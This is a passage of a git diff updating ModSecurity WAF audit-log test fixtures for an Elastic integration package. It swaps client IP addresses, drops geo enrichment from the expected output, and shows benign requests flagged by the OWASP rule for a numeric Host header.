charset=utf-8","Date":"Fri, 14 May 2021 14:52:47 GMT","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v25,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:11:52 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":40742,"host_ip":"162.62.123.46","host_port":443,"id":"162100511255.595254","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"dda3a9b33849ca9d88844c0331e9b98f\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:11:52 GMT","Server":"nginx/1.14.0","X-Request-Id":"63b9e1d0-481f-43b5-9ca3-e1606c48c338","X-Download-Options":"noopen","X-Runtime":"0.028032","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:12:01 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44460,"host_ip":"162.62.123.46","host_port":443,"id":"162100512158.550855","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"4b55096b2de9c691c0e0f67a496dc7d9\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:01 GMT","Server":"nginx/1.14.0","X-Request-Id":"b7220068-a82e-4535-be4c-a087fe3901ed","X-Download-Options":"noopen","X-Runtime":"0.029745","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:12:18 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":45952,"host_ip":"162.62.123.46","host_port":443,"id":"162100513893.802359","request":{"method":"GET","http_version":1.0,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"f7e5c631964147f2a3458c4f97647883\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:18 GMT","Server":"nginx/1.14.0","X-Request-Id":"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417","X-Download-Options":"noopen","X-Runtime":"0.026203","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.14","time_stamp":"Fri May 14 14:52:47 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44464,"host_ip":"67.43.156.14","host_port":443,"id":"162100396753.595789","request":{"method":"GET","http_version":1.1,"uri":"/owa/","headers":{"Host":"34.87.56.16","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36","Accept":"*/*","Accept-Encoding":"gzip"}},"response":{"http_code":404,"headers":{"Strict-Transport-Security":"max-age=31536000; includeSubDomains","X-Runtime":"0.003894","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Content-Encoding":"gzip","Vary":"Origin","Status":"404 Not Found","X-Request-Id":"435c78d3-c122-4dee-8ca5-101397fab368","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Date":"Fri, 14 May 2021 14:52:47 GMT","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v25,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:11:52 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":40742,"host_ip":"67.43.156.15","host_port":443,"id":"162100511255.595254","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"dda3a9b33849ca9d88844c0331e9b98f\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:11:52 GMT","Server":"nginx/1.14.0","X-Request-Id":"63b9e1d0-481f-43b5-9ca3-e1606c48c338","X-Download-Options":"noopen","X-Runtime":"0.028032","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:12:01 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44460,"host_ip":"67.43.156.15","host_port":443,"id":"162100512158.550855","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"4b55096b2de9c691c0e0f67a496dc7d9\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:01 GMT","Server":"nginx/1.14.0","X-Request-Id":"b7220068-a82e-4535-be4c-a087fe3901ed","X-Download-Options":"noopen","X-Runtime":"0.029745","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:12:18 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":45952,"host_ip":"67.43.156.15","host_port":443,"id":"162100513893.802359","request":{"method":"GET","http_version":1.0,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"f7e5c631964147f2a3458c4f97647883\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:18 GMT","Server":"nginx/1.14.0","X-Request-Id":"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417","X-Download-Options":"noopen","X-Runtime":"0.026203","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} diff --git a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json index 3f9a108d8d4..d1a020c97c9 100644 --- a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json @@ -10,26 +10,8 @@ "id": "920350" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", - "location": { - "lon": -0.0961, - "lat": 51.5132 - } - }, - "as": { - "number": 63949, - "organization": { - "name": "Linode, LLC" - } - }, "port": 44464, - "ip": "176.58.101.217" + "ip": "67.43.156.14" }, "message": "Host header is a numeric IP address", "url": { @@ -57,8 +39,8 @@ } }, "event": { - "ingested": "2021-09-17T03:51:00.601664853Z", - "original": "{\"transaction\":{\"client_ip\":\"176.58.101.217\",\"time_stamp\":\"Fri May 14 14:52:47 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44464,\"host_ip\":\"176.58.101.217\",\"host_port\":443,\"id\":\"162100396753.595789\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/owa/\",\"headers\":{\"Host\":\"34.87.56.16\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\",\"Accept\":\"*/*\",\"Accept-Encoding\":\"gzip\"}},\"response\":{\"http_code\":404,\"headers\":{\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"X-Runtime\":\"0.003894\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Connection\":\"keep-alive\",\"Content-Encoding\":\"gzip\",\"Vary\":\"Origin\",\"Status\":\"404 Not Found\",\"X-Request-Id\":\"435c78d3-c122-4dee-8ca5-101397fab368\",\"Server\":\"nginx/1.14.0\",\"Content-Type\":\"text/html; charset=utf-8\",\"Date\":\"Fri, 14 May 2021 14:52:47 GMT\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v25,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", + "ingested": "2021-12-09T13:41:30.594992100Z", + "original": "{\"transaction\":{\"client_ip\":\"67.43.156.14\",\"time_stamp\":\"Fri May 14 14:52:47 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44464,\"host_ip\":\"67.43.156.14\",\"host_port\":443,\"id\":\"162100396753.595789\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/owa/\",\"headers\":{\"Host\":\"34.87.56.16\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\",\"Accept\":\"*/*\",\"Accept-Encoding\":\"gzip\"}},\"response\":{\"http_code\":404,\"headers\":{\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"X-Runtime\":\"0.003894\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Connection\":\"keep-alive\",\"Content-Encoding\":\"gzip\",\"Vary\":\"Origin\",\"Status\":\"404 Not Found\",\"X-Request-Id\":\"435c78d3-c122-4dee-8ca5-101397fab368\",\"Server\":\"nginx/1.14.0\",\"Content-Type\":\"text/html; charset=utf-8\",\"Date\":\"Fri, 14 May 2021 14:52:47 GMT\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v25,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" ], @@ -91,23 +73,8 @@ "id": "920350" }, "source": { - "geo": { - "continent_name": "Asia", - "country_name": "Singapore", - "location": { - "lon": 103.8, - "lat": 1.3667 - }, - "country_iso_code": "SG" - }, - "as": { - "number": 132203, - "organization": { - "name": "Tencent Building, Kejizhongyi Avenue" - } - }, "port": 40742, - "ip": "162.62.123.46" + "ip": "67.43.156.15" }, "message": "Host header is a numeric IP address", "url": { @@ -135,8 +102,8 @@ } }, "event": { - "ingested": "2021-09-17T03:51:00.601675457Z", - "original": "{\"transaction\":{\"client_ip\":\"162.62.123.46\",\"time_stamp\":\"Fri May 14 15:11:52 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":40742,\"host_ip\":\"162.62.123.46\",\"host_port\":443,\"id\":\"162100511255.595254\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"dda3a9b33849ca9d88844c0331e9b98f\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:11:52 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"63b9e1d0-481f-43b5-9ca3-e1606c48c338\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.028032\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", + "ingested": "2021-12-09T13:41:30.594995900Z", + "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:11:52 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":40742,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100511255.595254\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"dda3a9b33849ca9d88844c0331e9b98f\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:11:52 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"63b9e1d0-481f-43b5-9ca3-e1606c48c338\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.028032\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" ], @@ -156,23 +123,8 @@ "id": "920350" }, "source": { - "geo": { - "continent_name": "Asia", - "country_name": "Singapore", - "location": { - "lon": 103.8, - "lat": 1.3667 - }, - "country_iso_code": "SG" - }, - "as": { - "number": 132203, - "organization": { - "name": "Tencent Building, Kejizhongyi Avenue" - } - }, "port": 44460, - "ip": "162.62.123.46" + "ip": "67.43.156.15" }, "message": "Host header is a numeric IP address", "url": { @@ -200,8 +152,8 @@ } }, "event": { - "ingested": "2021-09-17T03:51:00.601678749Z", - "original": "{\"transaction\":{\"client_ip\":\"162.62.123.46\",\"time_stamp\":\"Fri May 14 15:12:01 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44460,\"host_ip\":\"162.62.123.46\",\"host_port\":443,\"id\":\"162100512158.550855\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"4b55096b2de9c691c0e0f67a496dc7d9\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:01 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"b7220068-a82e-4535-be4c-a087fe3901ed\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.029745\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' 